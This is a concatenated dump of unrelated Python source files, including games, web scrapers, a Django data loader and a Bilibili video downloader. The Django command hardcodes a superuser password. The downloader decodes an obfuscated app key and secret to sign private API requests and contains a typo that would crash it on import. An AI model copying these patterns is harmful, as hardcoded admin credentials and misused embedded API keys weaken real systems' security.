2\r\n elif self.direction == 'R':\r\n self.rect.left = tank.rect.left + tank.rect.width\r\n self.rect.top = tank.rect.top + tank.rect.width / 2 - self.rect.width / 2\r\n\r\n def displayBullet(self):\r\n MainGame.window.blit(self.myBulletImg, self.rect)\r\n\r\n def move(self):\r\n if self.direction == 'U':\r\n if self.rect.top > 0:\r\n self.rect.top -= self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'R':\r\n if self.rect.left + self.rect.width < SCREEN_WIDTH:\r\n self.rect.left += self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'D':\r\n if self.rect.top + self.rect.height < SCREEN_HEIGHT:\r\n self.rect.top += self.speed\r\n else:\r\n self.alive = False\r\n elif self.direction == 'L':\r\n if self.rect.left > 0:\r\n self.rect.left -= self.speed\r\n else:\r\n self.alive = False\r\n\r\n def hitEnemyTank(self):\r\n for enemyTank in MainGame.enemyTanksList:\r\n if pygame.sprite.collide_rect(self, enemyTank):\r\n self.alive = False\r\n enemyTank.alive = False\r\n\r\n\r\nclass Explode():\r\n pass\r\n\r\nclass Wall():\r\n pass\r\n\r\nclass Music():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n MainGame().startGame()\r\n # MainGame().getFontSurface()","sub_path":"TankWar2.2.py","file_name":"TankWar2.2.py","file_ext":"py","file_size_in_byte":12149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"590164554","text":"#!/usr/bin/env python3\n\"\"\"ant_colony_tests.py: Solution quality test driver for ant colony TSP algorithm\"\"\"\n__author__ = \"Jessica Lynch\"\n\nimport tsp\nfrom time import perf_counter_ns\n\n\ndef main():\n # Assign timer function to variable\n clock = perf_counter_ns\n\n # Determine max run time for each algorithm\n MAX_MATRIX_SIZE = 50\n MAX_COST = 100\n NUM_TRIALS_PER_N = 50\n\n # Init table variables\n params = [\"Ants\", \"Max steps\", \"Phero\", \"Decay\", \"% Exact\", \"Min cost\", \"Avg. cost\"]\n cols_per_func = 7 # Update if additional data columns are added\n col_width_full = 13 * cols_per_func\n col_width_med = col_width_full // cols_per_func\n col_width_small = 10\n\n # Print function name and test info\n print(f\"{'':>{col_width_small}}\", end=\"\")\n print(f\"{'Ant Colony':>{col_width_full}}\", end=\"\")\n print(\"Trials per N x N matrix:\", NUM_TRIALS_PER_N)\n print(\"Graph type: circular Euclidean\")\n print(\"Graph radius:\", MAX_COST)\n\n # Print data columns (header second row)\n print(f\"{'N':>{col_width_small}}\", end=\"\")\n for param in params:\n print(f\"{param:>{col_width_med}}\", end=\"\")\n print(\"\\n\")\n\n # Test algorithm with N x N matrices\n # for N in range(2, MAX_MATRIX_SIZE + 1):\n N = 9\n while True:\n # Print current N value\n print(f\"{N:>{col_width_small}}\", end=\"\")\n\n # Generate N x N matrix\n matrix, min_path, min_cost = tsp.generate_circular_cost_matrix(N, MAX_COST)\n\n phero_factor = 1\n decay_factor = 1\n ants = 100\n steps = 20\n\n correct = 0\n total_cost = 0\n for _ in range(NUM_TRIALS_PER_N):\n path, cost = tsp.tsp_ant_colony(matrix, ants, phero_factor, decay_factor, steps)\n total_cost += cost\n if path == min_path or path == list(reversed(min_path)):\n correct += 1\n percent_correct = (correct / NUM_TRIALS_PER_N) * 100\n average_cost = total_cost / NUM_TRIALS_PER_N\n\n print(f\"{ants:>{col_width_med}}\", end=\"\")\n print(f\"{steps:>{col_width_med}}\", end=\"\")\n print(f\"{phero_factor:>{col_width_med}}\", end=\"\")\n print(f\"{decay_factor:>{col_width_med}}\", end=\"\")\n print(f\"{round(percent_correct, 1):>{col_width_med}}\", end=\"\")\n print(f\"{round(min_cost, 2):>{col_width_med}}\", end=\"\")\n print(f\"{round(average_cost, 2):>{col_width_med}}\", end=\"\")\n print()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ant_colony_tests.py","file_name":"ant_colony_tests.py","file_ext":"py","file_size_in_byte":2450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"414587777","text":"import bs4, requests\n\nURL = r'https://infostart.ru/job/vacancy/'\n\nres = requests.get(URL)\nres.raise_for_status()\nmySoup = bs4.BeautifulSoup(res.text)\n\n\nelems = mySoup.select('.vacancy-item')\n\nif len(elems)>0:\n rabbit = elems[0]\n rabbit.get('class') # attrs of finded div\n rabbit.attrs\n rabbit.select('a') # find elems
in rabbit\n rabbit.select('p')\n rabbit.select('p')[0]\n","sub_path":"6 web scraping/bs4_test.py","file_name":"bs4_test.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292962542","text":"from typing import Any, Optional\n\nfrom django.core.management.base import BaseCommand, CommandError\nimport csv\nfrom django.contrib.auth import get_user_model\nfrom reprohack_hub.models import Event, Paper, Review\nfrom datetime import datetime, timedelta\n\nclass Command(BaseCommand):\n help = \"Load initial data\"\n\n def handle(self, *args, **options):\n print(\"Creating initial db data\")\n admin_user = get_user_model().objects.create(username=\"rhadmin\",\n email=\"reprohack-hub@sheffield.ac.uk\",\n is_superuser=True,\n is_staff=True)\n admin_user.set_password(\"T47BfFovEAvTsJiKp3A\")\n admin_user.save()\n\n self.load_initial_data()\n\n\n def get_csv_dict(self, path):\n out_list = []\n with open(path) as events_file:\n reader = csv.DictReader(events_file)\n for row in reader:\n out_list.append(row)\n\n\n return out_list\n\n def load_initial_data(self):\n events_path = \"data/events.csv\"\n papers_path = \"data/papers.csv\"\n reviews_path = \"data/reviews.csv\"\n\n admin = get_user_model().objects.get(username=\"rhadmin\")\n\n events = self.get_csv_dict(events_path)\n for row in events:\n event = Event.objects.create()\n event.creator = admin\n event.host = \"\"\n event.title = row[\"title\"]\n event.is_initial_upload = True\n event.start_time = datetime.strptime(row[\"date\"] + \" \" + row[\"start_time\"], \"%Y-%m-%d %H:%M\")\n event.end_time = datetime.strptime(row[\"date\"] + \" \" + row[\"end_time\"], \"%Y-%m-%d %H:%M\")\n event.city = row[\"city\"]\n event.country = row[\"country\"]\n event.address1 = row[\"address\"]\n event.registration_url = row[\"url\"]\n event.event_coordinates = \",\".join([row[\"lat\"], row[\"lon\"]])\n event.save()\n\n\n\n papers = self.get_csv_dict(papers_path)\n for row in papers:\n print(row)\n\n reviews = self.get_csv_dict(reviews_path)\n for row in reviews:\n print(row)\n","sub_path":"reprohack_hub/management/commands/load_initial.py","file_name":"load_initial.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433942654","text":"import FWCore.ParameterSet.Config as cms\n\nhltJetSortedVBFFilterRecoPFJet = cms.EDFilter('HLTPFJetSortedVBFFilter',\n saveTags = cms.bool(True),\n inputJets = cms.InputTag('hltJetCollection'),\n inputJetTags = cms.InputTag(''),\n Mqq = cms.double(200),\n Detaqq = cms.double(2.5),\n Detabb = cms.double(10),\n Dphibb = cms.double(10),\n Ptsumqq = cms.double(0),\n Ptsumbb = cms.double(0),\n Etaq1Etaq2 = cms.double(40),\n value = cms.string('second'),\n triggerType = cms.int32(85),\n njets = cms.int32(4),\n mightGet = cms.optional.untracked.vstring\n)\n","sub_path":"HLTrigger/JetMET/hltJetSortedVBFFilterRecoPFJet_cfi.py","file_name":"hltJetSortedVBFFilterRecoPFJet_cfi.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"350679501","text":"from splinter import Browser\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport time\n\ndef scrape(): \n #executable_path = {'executable_path': 'chromedriver.exe'}\n #browser = Browser('chrome', **executable_path)\n browser = Browser('chrome', headless=True)\n\n news_url = 'https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest'\n browser.visit(news_url)\n time.sleep(1)\n news_html = browser.html\n soup = BeautifulSoup(news_html, 'html.parser')\n\n #code to loop through all latest articles on first page\n\n #articles = soup.find_all('li', class_='slide')\n\n #for article in articles:\n # text = article.find('div', class_='list_text')\n # news_title = text.find('div', class_='content_title').text\n # news_p = text.find('div', class_='article_teaser_body').text\n\n news_title = soup.find('div', class_='content_title').text\n news_p = soup.find('div', class_='article_teaser_body').text\n\n print(news_title)\n print(news_p)\n\n img_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(img_url)\n img_html = browser.html\n soup = BeautifulSoup(img_html, 'html.parser')\n\n featured_image = soup.find('a', class_ = 'button fancybox')['data-fancybox-href']\n featured_image_url = 'https://www.jpl.nasa.gov' + featured_image\n print(featured_image_url)\n\n weather_url = 'https://twitter.com/marswxreport?lang=en'\n browser.visit(weather_url)\n weather_html = browser.html\n soup = BeautifulSoup(weather_html, 'html.parser')\n\n mars_weather = soup.find('p', class_ =\"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text\n print(mars_weather)\n\n table_url = 'https://space-facts.com/mars/'\n\n table = pd.read_html(table_url)[0]\n table.columns = [\"Description\", \"Value\"]\n table = table.set_index(\"Description\", drop= True, inplace=False)\n table_html = table.to_html()\n print(table_html)\n\n hemi_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hemi_url)\n hemi_html = browser.html\n soup = BeautifulSoup(hemi_html, 'html.parser')\n\n links = soup.find_all('div', class_='item')\n\n hemi_base = \"https://astrogeology.usgs.gov\"\n hemi_urls = [str(hemi_base + link.a['href']) for link in links]\n\n hemisphere_image_urls = []\n\n for hemi_url in hemi_urls:\n browser.visit(hemi_url)\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img_url = soup.find('div', class_= 'downloads').a['href']\n title = soup.find('h2', class_= \"title\").text.rsplit(' ', 1)[0]\n entry = {\"title\" : title , \"img_url\" : img_url}\n hemisphere_image_urls.append(dict(entry))\n\n print(hemisphere_image_urls)\n\n mars_data = {\n 'newsTitle' : news_title,\n 'newsParagraph' : news_p,\n 'featuredImage' : featured_image_url,\n 'marsWeather' : mars_weather,\n 'tableHtml' : table_html,\n 'hemisphereImages' : hemisphere_image_urls\n }\n\n return mars_data\n\n","sub_path":"Mission to Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"124141726","text":"\"\"\"\nWrite a function that reverses the digits a 32-bit signed integer, x.\nAssume that the environment can only store integers within the 32-bit signed integer range,\n[-2^31, 2^31 - 1]. The function returns 0 when the reversed integer overflows.\n\nExample:\nInput: 123\nOutput: 321\n\"\"\"\n\n\nclass Solution:\n\n def reverse(self, x):\n neg = False\n if x < 0:\n x = -x\n neg = True\n if x >= 2**31:\n return 0\n else:\n _list = list(str(x))\n _list_reverse = _list[::-1]\n res = int(''.join(_list_reverse))\n return -res if neg else res\n\n\nprint(Solution().reverse(123))\n# 321\nprint(Solution().reverse(2**31))\n# 0\n","sub_path":"October/29Oct2019_Reverse_Integer.py","file_name":"29Oct2019_Reverse_Integer.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"144440115","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 23 17:06:37 2019\n\n@author: wenyz\n\"\"\"\nimport requests,re,hashlib,urllib.request,json\nimport os, sys\nimport socket\nsocket.setdefaulttimeout(30)\nimport threading,time\nfrom multiprocessing import Process,cpu_count\nfrom queue import Queue\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport configparser\n\nimport ffmpy3\n\n_DOWNLOAD_THERAD_NUM = 5\n_CONVERT_PROCESS_NUM = cpu_count()-1\n_DOWNLOAD_HOME = \"G:\\\\downloadtest\"\n_DIRECTORY_CREATE_LOCK = threading.Lock()\n_CONVERT_PROCESS_EXECUTOR = ProcessPoolExecutor(_CONVERT_PROCESS_NUM)\n\nconfig = configpaser.ConfigParser()\n\nclass AV:\n \n base_url = 'https://api.bilibili.com/x/web-interface/view?aid='\n headers = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n }\n \n def __init__(self,avid,quality):\n self.avid = str(avid)\n self.quality = quality\n self.pages = []\n self._init_data()\n \n def _init_data(self):\n html = requests.get(self.base_url + self.avid,headers=self.headers).json()\n data = html['data']\n self.title = data[\"title\"].replace(\" \",\"_\")\n cid_list = data['pages']\n clip_list = []\n for info in cid_list:\n self.pages.append(Page(str(info['cid']),info['page'],info['part'],self))\n \n for page in self.pages:\n clip_list = get_play_list(self.base_url +self.avid + '?p='+ str(page.num),page.cid,80)\n \n clips = []\n index = 0\n for clip in clip_list:\n index += 1\n clips.append(Clip(index,clip,page))\n page.clips = clips\n\n\nclass DownloadRawVideo(threading.Thread):\n def __init__(self,clips_queue):\n threading.Thread.__init__(self)\n self.clips_queue = clips_queue\n self.isDaemon = True\n \n def run(self):\n while True:\n if not self.clips_queue.empty():\n clip = self.clips_queue.get()\n self.down_raw_data(clip)\n self.clips_queue.task_done()\n\n \n def down_raw_data(self,clip):\n opener = urllib.request.build_opener()\n opener.addheaders = [\n ('Host', 'upos-hz-mirrorks3.acgvideo.com'), #代理是必要的,不然很容易就被拒绝访问\n ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0'),\n ('Accept', '*/*'),\n ('Accept-Language', 'en-US,en;q=0.5'),\n ('Accept-Encoding', 'gzip, deflate, br'),\n ('Range', 'bytes=0-'),\n ('Referer', AV.base_url),\n ('Origin', 'https://www.bilibili.com'),\n ('Connection', 'keep-alive'),\n ]\n urllib.request.install_opener(opener)\n \n currentVideoPath = os.path.join(_DOWNLOAD_HOME, clip.page.av.title,clip.page.title)\n if not os.path.exists(currentVideoPath):\n #防止多线程创建重复文件夹报错\n if _DIRECTORY_CREATE_LOCK.acquire():\n #double check lock\n if not os.path.exists(currentVideoPath):\n os.makedirs(currentVideoPath)\n _DIRECTORY_CREATE_LOCK.release()\n \n download_file_name = os.path.join(currentVideoPath, r'{}-{}.flv'.format(clip.page.title, clip.num))\n if os.path.exists(download_file_name):\n print(\"{}已经下载完毕!\",download_file_name) \n return\n \n download_video(raw_url=clip.url, raw_file_name=download_file_name,raw_cmd=None)\n \ndef convert_video(page):\n print('convert_video executed')\n currentVideoPath = os.path.join(_DOWNLOAD_HOME, page.av.title,page.title)\n \n L = []\n root_dir = currentVideoPath\n \n for file in sorted(os.listdir(root_dir),key=lambda x:int(x[x.rindex(\"-\") + 1:x.rindex(\".\")])):\n if os.path.splitext(file)[1] == '.flv':\n L.append(\"file '{}'\".format(os.path.join(root_dir,file)))\n \n tmp_file_path = os.path.join(root_dir,'tmp.txt')\n tmp_file = open(tmp_file_path,'w')\n \n for strs in L:\n tmp_file.write(strs+'\\n')\n tmp_file.close()\n \n output = os.path.join(os.path.join(_DOWNLOAD_HOME, page.av.title),page.title + '.flv')\n \n ff = ffmpy3.FFmpeg(\n inputs={tmp_file_path:'-f concat -safe 0'},\n outputs = {output:'-c copy -y'},\n )\n \n ff.run()\n if os.path.exists(tmp_file_path):\n os.remove(tmp_file_path)\n print(\"complete\")\n \n# 访问API地址\ndef get_play_list(start_url, cid, quality):\n entropy = 'rbMCKn@KuamXWlPMoJGsKcbiJKUfkPF_8dABscJntvqhRSETg'\n appkey, sec = ''.join([chr(ord(i) + 2) for i in entropy[::-1]]).split(':')\n params = 'appkey=%s&cid=%s&otype=json&qn=%s&quality=%s&type=' % (appkey, cid, quality, quality)\n chksum = hashlib.md5(bytes(params + sec, 'utf8')).hexdigest()\n url_api = 'https://interface.bilibili.com/v2/playurl?%s&sign=%s' % (params, chksum)\n headers = {\n 'Referer': AV.base_url, # 注意加上referer\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'\n }\n\n html = requests.get(url_api, headers=headers).json()\n\n video_list = []\n for i in html['durl']:\n video_list.append(i['url'])\n return video_list\n\n\ndef download_video(raw_url,raw_file_name,raw_cmd):\n sleep_time = [2,4,30,60,300,3600,20000]\n sleep_index = -1\n while True:\n sleep_index = (sleep_index+1)%7\n try:\n urllib.request.urlretrieve(url=raw_url, filename=raw_file_name,reporthook=raw_cmd)\n break\n except socket.timeout:\n print(\"socket timeout occured!\")\n time.sleep(sleep_time[sleep_index])\n except urllib.error.URLError as e:\n print(\"urllib.error.URLError : \",e.reason)\n time.sleep(sleep_time[sleep_index])\n except Exception as e:\n print(\"unhandled Exception : \",e.reason)\n time.sleep(sleep_time[sleep_index])\n\nclass Page:\n def __init__(self,cid,num,title,av,url=None):\n self.av = av\n self.cid = cid\n self.url = url\n self.num = num\n self.title = title\n self.clips = []\n \nclass Clip:\n def __init__(self,num,url,page):\n self.num = num\n self.url = url\n self.page = page\n\ndef deal_av(avid,quality):\n current = AV(avid,quality)\n download_queue = Queue(maxsize=0)\n for page in current.pages:\n for clip in page.clips:\n download_queue.put(clip)\n \n threads = []\n for i in range(_DOWNLOAD_THERAD_NUM):\n thread = DownloadRawVideo(download_queue)\n thread.start()\n threads.append(thread)\n \n #[t.join() for t in threads]\n download_queue.join()\n print(\"av download finish\")\n \n _CONVERT_PROCESS_EXECUTOR.map(convert_video,current.pages)\n \n \n\nif __name__ == '__main__':\n deal_av('25755767',80)\n \n _CONVERT_PROCESS_EXECUTOR.shutdown()\n print(\"convert finished\")","sub_path":"bilibili_video_spider.py","file_name":"bilibili_video_spider.py","file_ext":"py","file_size_in_byte":7148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"26340811","text":"import requests\nfrom bs4 import BeautifulSoup as bs\n\ndef getLink(url):\n res = requests.get(url)\n soup = bs(res.content, \"html5lib\")\n products = soup.find('div', attrs={'id': 'categoryList-contents-list'}).findAll('li')\n if len(products) is 0:\n return 0\n with open('links.txt', 'a+') as f:\n for product in products[::5]:\n link = product.find('a').get('href')\n f.write('http://www.wconcept.co.kr' + link)\n f.write('\\n')\n return 1\n\nif __name__ == '__main__':\n base_urls = ['http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M90396395&ca=&czone=1',\n 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M21405086&ca=&czone=4',\n 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M60696432&ca=&czone=2',\n 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M81180801&ca=&czone=3',\n 'http://www.wconcept.co.kr/Shop/ShopLarge_all.asp?mcd=M69578731&ca=&czone=6']\n for base_url in base_urls:\n page = 1\n flag = 1\n while flag != 0:\n url = base_url + '&page=' + str(page)\n flag = getLink(url)\n page += 1\n","sub_path":"wconcept_co_kr/getLinks.py","file_name":"getLinks.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"175949679","text":"# Imports, sorted alphabetically.\n\n# Python packages\nfrom time import time\n\n# Third-party packages\n# Nothing for now...\n\n# Modules from this project\nimport globals as G\nfrom nature import *\nfrom world import *\n\n\nclass Model(World):\n def __init__(self, initialize=True):\n super(Model, self).__init__()\n if initialize:\n print('Building terrain...')\n print('using Perlin...')\n return\n\n #skip all of this, using perlin now.\n start = time()\n self.initialize()\n print('Terrain successfully built in %f seconds.' % (time() - start))\n\n print('Preparing game...')\n self.post_initialize()\n\n def initialize(self):\n world_size = G.config.getint('World', 'size')\n world_type = G.TERRAIN_CHOICE # FIXME: Unify names!\n hill_height = G.TERRAIN['hill_height']\n self.max_trees = G.TERRAIN['max_trees']\n tree_chance = self.max_trees / float(world_size *\n (G.SECTOR_SIZE ** 3))\n n = world_size / 2 # 80\n s = 1\n y = 0\n\n worldtypes_grounds = {\n 'plains': dirt_block,\n 'desert': (sand_block,) * 15 + (sandstone_block,) * 4,\n 'island': (water_block,) * 30 + (clay_block,) * 4,\n 'mountains': (dirt_block,) * 15 + (dirt_block,) * 3 + (stone_block,),\n 'snow': (snowgrass_block,) * 10 + (snow_block,) * 4 + (ice_block,) * 8,\n }\n\n world_type_trees = {\n 'plains': (OakTree, BirchTree, WaterMelon, Pumpkin, YFlowers, Potato, Carrot, Rose),\n 'desert': (Cactus, TallCactus, Rose),\n 'island': (OakTree, JungleTree, BirchTree, Cactus, TallCactus, WaterMelon, YFlowers, Reed, Rose),\n 'mountains': (OakTree, BirchTree, Pumpkin, YFlowers, Potato, Carrot),\n 'snow': (OakTree, BirchTree, WaterMelon, YFlowers, Potato, Rose),\n }\n\n # ores avaliable on the lowest level, closet to bedrock\n lowlevel_ores = ((stone_block,) * 75 + (diamondore_block,) * 2 + (sapphireore_block,) * 2)\n # ores in the 'mid-level' .. also, the common ore blockes\n midlevel_ores = ((stone_block,) * 80 + (rubyore_block,) * 2 +\n (coalore_block,) * 4 + (gravel_block,) * 5 +\n (ironore_block,) * 5 + (lapisore_block,) * 2)\n # ores closest to the top level dirt and ground\n highlevel_ores = ((stone_block,) * 85 + (gravel_block,) * 5 + (coalore_block,) * 3 + (quartz_block,) * 5)\n\n for x in xrange(-n, n + 1, s):\n for z in xrange(-n, n + 1, s):\n\n # Generation of the outside wall\n if x in (-n, n) or z in (-n, n):\n for dy in xrange(-16, 10): # was -2 ,6\n self.init_block((x, y + dy, z), stone_block)\n continue\n\n # Generation of the ground\n\n block = worldtypes_grounds[world_type]\n levelcount=0\n\n\n if isinstance(block, (tuple, list)):\n block = random.choice(block)\n self.init_block((x, y - 2, z), block)\n for yy in xrange(-16, -2):\n # ores and filler...\n #oblock = random.choice(ore_type_blocks)\n levelcount = levelcount +1\n if levelcount < 4:\n blockset = lowlevel_ores\n if levelcount >= 5 and levelcount <= 13:\n blockset = midlevel_ores\n if levelcount >= 14:\n blockset = highlevel_ores\n oblock = random.choice(blockset)\n self.init_block((x, yy, z), oblock)\n\n for yy in xrange(-18, -16):\n self.init_block((x, yy , z), bed_block)\n\n # Perhaps a tree\n if self.max_trees > 0:\n showtree = random.random()\n if showtree <= tree_chance:\n tree_class = world_type_trees[world_type]\n if isinstance(tree_class, (tuple, list)):\n tree_class = random.choice(tree_class)\n self.generate_vegetation((x, y - 2, z), tree_class)\n\n if G.FLAT_MODE:\n return\n\n o = n - 10 + hill_height - 6\n\n world_type_blocks = {\n 'plains': dirt_block,\n 'desert': sand_block,\n 'island': (dirt_block, sand_block),\n 'mountains': stone_block,\n 'snow': snowgrass_block,\n }\n\n # Hills generation\n # FIXME: This generation in two phases (ground then hills), leads to\n # hills overlaying trees.\n for _ in xrange(world_size / 2 + 40): # (120):\n a = random.randint(-o, o)\n b = random.randint(-o, o)\n c = -1\n h = random.randint(1, hill_height)\n s = random.randint(4, hill_height + 2)\n d = 1\n block = world_type_blocks[world_type]\n if isinstance(block, (tuple, list)):\n block = random.choice(block)\n for y in xrange(c, c + h):\n for x in xrange(a - s, a + s + 1):\n for z in xrange(b - s, b + s + 1):\n if (x - a) ** 2 + (z - b) ** 2 > (s + 1) ** 2:\n continue\n if (x - 0) ** 2 + (z - 0) ** 2 < 5 ** 2:\n continue\n if (x, y, z) in self:\n continue\n self.init_block((x, y, z), block)\n\n # Perhaps a tree\n if self.max_trees > 0:\n showtree = random.random()\n if showtree <= tree_chance:\n tree_class = world_type_trees[world_type]\n if isinstance(tree_class, (tuple, list)):\n tree_class = random.choice(tree_class)\n self.generate_vegetation((x, y, z), tree_class)\n\n s -= d\n\n def generate_vegetation(self, position, vegetation_class):\n if position in self:\n return\n\n # Avoids a tree from touching another.\n if vegetation_class in TREES \\\n and self.has_neighbors(position, is_in=TREE_BLOCKS,\n diagonals=True):\n return\n\n x, y, z = position\n\n # Vegetation can't grow on anything.\n if self[(x, y - 1, z)] not in vegetation_class.grows_on:\n return\n\n vegetation_class.add_to_world(self, position)\n\n def init_block(self, position, block):\n self.add_block(position, block, sync=False, force=False)\n\n def post_initialize(self):\n # Convert dirt to grass if no block or a transparent one is above.\n for position, block in ((p, b) for p, b in self.items()\n if b is dirt_block):\n x, y, z = position\n above_position = x, y + 1, z\n if above_position not in self or self[above_position].transparent:\n self[position] = grass_block\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"142528505","text":"import networkx as nx\ndef createG():\n G = nx.Graph()\n G.add_nodes_from([2, 3])\n G.add_edge(2,3)\n return G\n\nG = createG()\nimport json\nimport networkx as nx\nfrom networkx.readwrite import json_graph\njgraph = json_graph.node_link_data(G)\njs = json.dumps(jgraph)\n\ndef writejs(js):\n import os\n os.path.append('/home/cai.507/Documents/DeepLearning/GraphSAGE')\n file = '/home/cai.507/Documents/DeepLearning/GraphSAGE/' + 'test_data'\n f = open(file, 'w')\n f.write(js)\n f.close()\n\nf = open(file, 'r')\njson_repr = f.read()\nassert js == json_repr\nf.close()\n\nfrom networkx.readwrite import json_graph\n\nX = json_graph.node_link_graph(json_repr)\nnx.node_\n\nfrom networkx.readwrite import json_graph\nG = createG()\ndata = json_graph.node_link_data(G)\nimport pickle\nwith open('dict', 'wb') as handle:\n pickle.dump(data, handle, protocol=2)\nwith open('dict', 'rb') as handle:\n data_ = pickle.load(handle)\nassert data == data_\n\nH = json_graph.node_link_graph(data_)\n","sub_path":"graphsage/nxio.py","file_name":"nxio.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"45289738","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/17679\n\ndef down(m, n, check, board):\n num = 0\n for c in range(m):\n for t in range(n):\n if check[c][t] == True:\n print(c, t)\n num += 1\n if c == 0:\n board[c][t] = '-'\n else:\n board[c][t] = board[c - 1][t]\n board[c - 1][t] = '-'\n \n return num, board\n\n# False로 변경\ndef matching(m, n, board):\n # False로 초기화된 check 배열 생성\n check = [[False for j in range(n)] for i in range(m)]\n \n for b in range(m - 1):\n for _b in range(n - 1):\n if board[b][_b] != '-' and board[b][_b] == board[b][_b + 1] == board[b + 1][_b] == board[b + 1][_b + 1]:\n check[b][_b] = True\n check[b][_b + 1] = True\n check[b + 1][_b] = True\n check[b + 1][_b + 1] = True\n \n return check, board\n \ndef solution(m, n, board):\n board = [list(x) for x in board]\n answer = 0\n \n while True:\n new_check, new_board = matching(m, n, board)\n if new_check != [[False for j in range(n)] for i in range(m)]:\n num, board = down(m, n, new_check, new_board)\n answer += num\n else:\n break\n \n return answer\n\n# print(solution(4, 5, [\"CCBDE\", \"AAADE\", \"AAABF\", \"CCBBF\"]))\n# print(solution(6, 6, [\"TTTANT\", \"RRFACC\", \"RRRFCC\", \"TRRRAA\", \"TTMMMF\", \"TMMTTJ\"]))\nprint(solution(3, 8, [\"AAAAAAAA\", \"BBAAAACC\", \"BBAAAACC\"]))","sub_path":"python_/programmers/Lv.2/[1차] 프렌즈4블록.py","file_name":"[1차] 프렌즈4블록.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"528455552","text":"import json\nimport requests\nimport sys\nsys.path.append('../')\nimport globals\n\nimport appJar\n\ntry:\n import xir\n from xir import eq, choice, gt, ge, select\n NOXIR=False\nexcept ImportError:\n NOXIR=True\n\nmainUrl = 'http://127.0.0.1:5000/'\n\ndef removeEndDigit(name):\n return name.strip(\"0123456789\")\n\n\nclass deployHandler():\n\n def __init__(self):\n self.constraintButtons = []\n self.constraints = {}\n self.mergedConstraints = {}\n\n def expandConstraints(self):\n self.constraints = {}\n # XXX This is a lot of extra work to redo the globals constraint dictionary\n # to include only the types we deal with for constraints right now and\n # to expand cases where the main node name (e.g. 'fred') has a constraint of 'num'\n # and deal with cases when there are specific constraints of some of these (e.g. an 'os' for 'fred1')\n for n in globals.nodes:\n self.constraints[n] = {}\n for type in ['os', 'nodetype', 'num']:\n if n in globals.constraints and type in globals.constraints[n]:\n self.constraints[n][type] = globals.constraints[n][type]\n elif removeEndDigit(n) in globals.constraints and type in globals.constraints[removeEndDigit(n)]:\n self.constraints[n][type] = globals.constraints[removeEndDigit(n)][type]\n \n def mergeConstraints(self):\n # After we've expanded constraints, we can merge ones that are the same.\n self.mergedConstraints = {}\n covered = []\n for n in self.constraints:\n #if 'num' in self.constraints[n]:\n # numWSame = int(self.constraints[n]['num'])\n #else:\n numWSame = 1\n if n in covered:\n continue\n for x in self.constraints:\n if x in covered:\n continue\n # Don't compare our self to our self (no point), and don't compare two things with different base names.\n if n != x and removeEndDigit(n) == removeEndDigit(x):\n # If we find the same name-start + all the same constraints are the same, we can merge these.\n sameConstraints = True\n for type in self.constraints[n]:\n if type not in self.constraints[x] or self.constraints[x][type] != self.constraints[n][type]:\n sameConstraints = False\n if sameConstraints:\n #if 'num' in self.constraints[x]:\n # numWSame = numWSame + int(self.constraints[x]['num'])\n #else:\n # numWSame = int(numWSame) + 1\n numWSame = int(numWSame) + 1\n covered.append(x)\n self.mergedConstraints[n] = {}\n self.mergedConstraints[n]['count'] = int(numWSame)\n for type in self.constraints[n]:\n if type != 'num':\n self.mergedConstraints[n][type] = self.constraints[n][type]\n covered.append(n)\n \n \n def process_constraints(self):\n \n checkBoxesToAdd = []\n \n for c in self.constraintButtons:\n try:\n 